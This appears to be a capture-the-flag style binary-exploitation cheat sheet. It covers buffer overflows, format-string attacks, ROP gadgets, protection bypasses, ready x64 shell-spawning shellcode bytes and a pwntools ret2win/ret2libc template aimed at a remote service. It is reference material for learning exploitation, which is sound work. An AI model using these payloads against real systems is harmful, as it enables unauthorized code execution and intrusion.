LKS Binary Exploitation Toolkit

Buffer Overflow Basics

Stack layout (high to low): RET | RBP | Local Variables | Buffer

Step	Action
1. Find offset	Linux`cyclic 200 \| ./vuln` then `cyclic -l <crash_addr>`
2. Control RIP	Overflow = padding + new_RIP
3. Find win func	Linux`objdump -d binary \| grep win`
4. Build payload	Any`padding + p64(win_addr)`

Offset Calculator

Buffer size

Saved RBP size

ret2win Payload Generator

Offset to RIP

Win function address

Format String Attacks

Specifier	Action
`%p`	Leak stack pointer
`%x`	Leak hex value
`%s`	Leak string at address
`%n`	Write number of chars printed
`%N$p`	Leak Nth argument
`%N$n`	Write to Nth argument
`%hhn`	Write 1 byte
`%hn`	Write 2 bytes

Format String Calculator

Target address

Value to write

Offset to buffer

Bytes already printed

Stack Leak Finder

ROP Chain Techniques

Technique	Description
ret2libc	Call system("/bin/sh") from libc
ret2win	Jump to existing win function
ret2plt	Call function through PLT
ret2csu	Use __libc_csu_init gadgets
ret2dlresolve	Abuse dynamic linker
Stack pivot	Move RSP to controlled area

Common Gadgets

Gadget	Use
`pop rdi; ret`	Set 1st argument
`pop rsi; pop r15; ret`	Set 2nd argument
`pop rdx; ret`	Set 3rd argument
`ret`	Stack alignment (16-byte)
`leave; ret`	Stack pivot
`xchg eax, esp; ret`	Stack pivot

AnyFind gadgets: ROPgadget --binary ./vuln or ropper -f ./vuln

ret2libc Calculator

system() offset

/bin/sh offset

Libc base (leaked)

pop rdi; ret gadget

Libc Database

libc.blukat.me libc.rip libc-database

Linux x64 Shellcode

Type	Hex	Size
execve /bin/sh	`48 31 f6 56 48 bf 2f 62 69 6e 2f 2f 73 68 57 54 5f 6a 3b 58 99 0f 05`	23 bytes
execve (shorter)	`31 c0 48 bb d1 9d 96 91 d0 8c 97 ff 48 f7 db 53 54 5f 99 52 57 54 5e b0 3b 0f 05`	27 bytes

Syscall Reference (x64)

Syscall	RAX	RDI	RSI	RDX
read	0	fd	buf	count
write	1	fd	buf	count
open	2	filename	flags	mode
execve	59 (0x3b)	filename	argv	envp
mprotect	10	addr	len	prot

Shellcode Encoder

Protection Bypass Techniques

Protection	Bypass
NX (No Execute)	ROP chain, ret2libc, ret2plt
Stack Canary	Leak canary via format string, brute force (fork)
PIE	Leak binary base address, partial overwrite
ASLR	Leak libc address, brute force (32-bit)
Full RELRO	Cannot overwrite GOT, use other techniques
Partial RELRO	GOT overwrite still possible

Canary Detection

Canary characteristics: - Usually ends with 0x00 (null byte) - 8 bytes on 64-bit, 4 bytes on 32-bit - Random on each execution - Same within process (fork) Leak methods: 1. Format string: %N$p 2. Array out-of-bounds read 3. Memory disclosure vulnerability

PIE Bypass

With PIE enabled: - All addresses are randomized - Need to leak binary base first - Partial overwrite (1-2 bytes) if offset known Common leaks: 1. Format string: %N$p to leak return address 2. Array read to leak GOT/PLT 3. Subtract known offset to get base

Pwntools Template

#!/usr/bin/env python3
from pwn import *

# Setup
context.binary = elf = ELF('./vuln')
context.log_level = 'debug'

# libc = ELF('./libc.so.6')
# rop = ROP(elf)

# Local or remote
# p = process('./vuln')
p = remote('host', 1337)

# Find offset
# offset = cyclic_find(0x61616161)
offset = 72

# Build payload
payload = b'A' * offset
payload += p64(elf.symbols['win'])
# payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
# payload += p64(next(elf.search(b'/bin/sh')))
# payload += p64(elf.plt['system'])

# Send
p.sendlineafter(b'> ', payload)

p.interactive()

Useful Pwntools Functions

Function	Description
`p64(addr)` / `p32(addr)`	Pack address (little-endian)
`u64(data)` / `u32(data)`	Unpack bytes to integer
`cyclic(200)`	Generate pattern
`cyclic_find(0x61616161)`	Find offset in pattern
`ROP(elf)`	ROP gadget finder
`elf.symbols['main']`	Get symbol address
`elf.got['puts']`	GOT entry address
`elf.plt['puts']`	PLT entry address
`next(elf.search(b'/bin/sh'))`	Search string in binary
`fmtstr_payload(offset, {addr: val})`	Format string payload